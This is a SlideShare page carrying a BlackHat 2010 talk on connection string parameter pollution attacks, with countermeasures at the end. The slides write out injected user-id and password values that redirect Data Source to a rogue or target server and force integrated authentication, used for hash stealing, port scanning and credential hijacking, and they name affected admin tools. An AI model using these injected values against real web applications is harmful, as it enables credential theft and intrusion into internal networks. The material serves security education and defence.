Connection String Parameter Pollution Attacks

4,539 views

Published on

Talk delivered by Chema Alonso and Jose Palazon "Palako" in BlackHat DC 2010 about Connection String Injection Parameter Pollution attacks.

0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
4,539
On SlideShare
0
From Embeds
0
Number of Embeds
533
Actions
Shares
0
Downloads
95
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide

Connection String Parameter Pollution Attacks

  1. 1. p<br />Chema Alonso & Palako<br />Informática 64<br />Chema Alonso<br />Informática 64<br />
  2. 2. ConnectionStrings<br />Define thewayanapplicationconnectsto data repository<br />There are connectionstringsfor:<br />RelationalDatabases (MSSQL, Oracle, MySQL,…)<br />LDAP Directories<br />Files <br />Etc…<br />
  3. 3. DatabasesConnectionStrings<br />Data Source = myServerAddress;<br />InitialCatalog = myDataBase;<br />User Id = myUsername;<br />Password = myPassword;<br />
  4. 4. DB Connectionbuild up<br />
  5. 5. Google Hacking <br />
  6. 6. Google Hacking <br />
  7. 7. UDL (Universal Data Links) Files<br />
  8. 8. HowWebappconnectsto DB<br />OperatingSystemAccounts<br />DatabaseCredentials<br />Data Source = myServerAddress;<br />InitialCatalog = myDataBase;<br />User Id =;<br />Password =;<br />Integrated Security = SSPI/True/Yes;<br />Data Source = myServerAddress;<br />InitialCatalog = myDataBase;<br />User Id = myUsername;<br />Password = myPassword;<br />Integrated Security = No;<br />
  9. 9. Usersauthenticatedby Web App<br />Web applicationmanagestheloginprocess<br />Syslogins<br />1.- Web applicatonconnectsusingitscredentialstothedatabase.<br />2.- Asksuserlogininformation.<br />3.- Checkslogininformationaboutinfostored in customuserstable.<br />Connectionstring<br />Customuserstable<br />Select id fromusers<br />DatabaseEngine<br />Apprunningon Web Server<br />
  10. 10. UsersautheticatedbyDatabase<br />Databaseenginemanagestheloginprocess<br />1.- Web applicationasksforcredentials.<br />2.- A connectionstringiscomposedwiththecredentialstoconnecttothedatabase.<br />3.- Roles and permits are limitedbytheuserused in theconnectionstring<br />Syslogins<br />Connectionstring<br />DatabaseEngine<br />Apprunningon Web Server<br />
  11. 11. ConnectionStringAttacks<br />It´spossibletoinjectparametersintoconnectionstringsusingsemicolons as a separator<br />Data Source = myServerAddress;<br />InitialCatalog = myDataBase;<br />Integrated Security = NO;<br />User Id = myUsername;<br />Password = myPassword; Encryption = Off;<br />
  12. 12. ConnectionStringBuilder<br />Available in .NET Framework 2.0<br />Buildsecureconnectionstringsusingparameters<br />It´snotpossibletoinjectintotheconnectionstring<br />
  13. 13. Are peopleaware of this?<br />
  14. 14. ConnectionStringParameterPollution<br />The goal is to inject parameters in the connection string, whether they exist or not<br />Had duplicated a parameter, the last value wins<br />This behavior allows attackers to overwrite completely the connection string, therefore to manipulate the way the application will work and how should be the it authenticated<br />
  15. 15. PollutionableBehavior<br />Param1=Value A<br />Param2=Value B<br />Param1=Value C<br />Param2=Value D<br />DBConnectionObject<br />Param1<br />Param2<br />
  16. 16. What can be done with CSPP?Overwrite a parameter<br />Data Source=DB1<br />UID=sa<br />Data Source=DB2<br />password=Pwnd!<br />DBConnectionObject<br />DataSource<br />UID<br />password<br />
  17. 17. Scanningthe DMZ<br />DevelopmentDatabase 1<br />FinnacialDatabase<br />Test Database<br />ForgottenDatabase<br />Internet<br />FW<br />Web app vulnerable to CSPP<br />ProductionDatabase<br />Data<br />Source<br />
  18. 18. Port Scanning a Server<br />ProductionDatabase<br />Server<br />FW<br />DataSource<br />DB1,80<br />Internet<br />Web app vulnerable to CSPP<br />DB1,21<br />DB1,25<br />DB1,1445<br />
  19. 19. What can be done with CSPP?Add a parameter<br />Data Source=DB1<br />UID=sa<br />Integrated Security=True<br />password=Pwnd!<br />DBConnectionObject<br />DataSource<br />UID<br />password<br />
  20. 20. CSPP Attack 1: Hash stealing<br />1.- Run a Rogue Server onanaccessible IP address:<br />Rogue_Server<br />2.- Activate a snifferto catch theloginprocess<br />Cain/Wireshark<br />3.- Overwrite Data Sourceparameter<br />Data_Source=Rogue_Server<br />4.- Force Windows IntegratedAuthentication<br />Integrated Security=true<br />
  21. 21. CSPP Attack 1: Hash stealing<br />Data source = SQL2005; initial catalog = db1;<br />Integrated Security=no; user id=+’User_Value’+; <br />Password=+’Password_Value’+; <br />Data source = SQL2005; initial catalog = db1;<br />Integrated Security=no; user id=;Data Source=Rogue_Server; <br />Password=;Integrated Security=True; <br />
  22. 22. CSSP 1:ASP.NET Enterprise Manager<br />
  23. 23. CSPP Attack 2: Port Scanning<br />1.- Duplicatethe Data Sourceparametersettingthe Target server and target porttobescanned. Data_Source=Target_Server,target_Port<br />2.- Checkthe error messages:<br /> - No TCP Connection -&gt; Port isclosed<br /> - No SQL Server -&gt; Port is open<br /> - InvalidPassword -&gt; SQL Server there!<br />
  24. 24. CSPP Attack 2: Port Scanning<br />Data source = SQL2005; initial catalog = db1;<br />Integrated Security=no; user id=+’User_Value’+; <br />Password=+’Password_Value’+; <br />Data source = SQL2005; initial catalog = db1;<br />Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port; <br />Password=;Integrated Security=True; <br />
  25. 25. CSPP 2: myLittleAdmin<br />Port is Open<br />
  26. 26. CSPP 2: myLittleAdmin<br />Port isClosed<br />
  27. 27. CSPP Attack 3: Hijacking Web Credentials<br />1.- Duplicate Data Sourceparametertothe target SQL Server<br />Data_Source=Target_Server<br />2.- Force Windows Authentication<br />Integrated Security=true<br />3.- Application pool in whichthe web appisrunningonwillsenditscredentials in orderto log in tothedatabaseengine.<br />
  28. 28. CSPP Attack 3: Hijacking Web Credentials<br />Data source = SQL2005; initial catalog = db1;<br />Integrated Security=no; user id=+’User_Value’+; <br />Password=+’Password_Value’+; <br />Data source = SQL2005; initial catalog = db1;<br />Integrated Security=no; user id=;Data Source=Target_Server; <br />Password=;Integrated Security=true; <br />
  29. 29. CSPP Attack 3: Web Data Administrator<br />
  30. 30. CSPP Attack 3: myLittleAdmin/myLittleBackup<br />
  31. 31. CSPP Attack 3: ASP.NET Enterprise Manager<br />
  32. 32. OtherDatabases<br />MySQL<br />Does not support Integrated security<br />It´s possible to manipulate the behavior of the web application, although<br />Port Scanning<br />Connect to internal/testing/for developing Databases<br />Steal credentials<br />Oracle supports integrated authority running on Windows and UNIX/Linux servers<br />It´s possible to perform all described attacks<br />Hash stealing<br />Port Scanning<br />Hijacking Web credentials<br />Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance<br />
  33. 33. Demo<br />Demo<br />
  34. 34. Scanner<br />Proof of concept to test yournetwork<br />Try a hijacking web credentialsattack<br />Written in ASP.NET C#<br />Free download (codeinclude of course)<br />http://www.informatica64.com/csppScanner.aspx<br />
  35. 35. CSPP Scanner<br />
  36. 36. Scanner CSPP: Attacks<br />
  37. 37. Demo<br />Demo<br />
  38. 38. myLittleAdmin/myLittleBackup<br />myLittleToolsreleased a securyadvisory and a patchaboutthis<br />
  39. 39. ASP.NET Enterprise Manager<br />ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels.<br />Fix the code yourself<br />
  40. 40. ASP.NET Enterprise Manager<br />ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels.<br />Fix the code yourself<br />
  41. 41. ASP.NET Web Data Admistrator<br />ASP Web Data Administratorissecure in CodePlex web site, butnot in Microsoft web sitewhereanunsecureoldversioniswaspublished<br />
  42. 42. Countermeasures<br />Hardenyour firewall<br />Outboundconnections<br />Reviewyourinternalaccountspolicy<br />Web application<br />Web server<br />DatabaseEngine<br />Use ConnectionStringBuilder<br />Filterthe;)<br />
  43. 43. Questions?<br />Contacto<br />Chema Alonso <br />chema@informatica64.com<br />http://www.informatica64.com<br />http://elladodelmal.blogspot.com<br />http://twitter.com/chemaalonso<br />José Palazón “Palako”<br />palako@lateatral.com<br />Authors<br />Chema Alonso <br />Manuel Fernández “The Sur”<br />Alejandro Martín Bailón<br />Antonio Guzmán<br />

×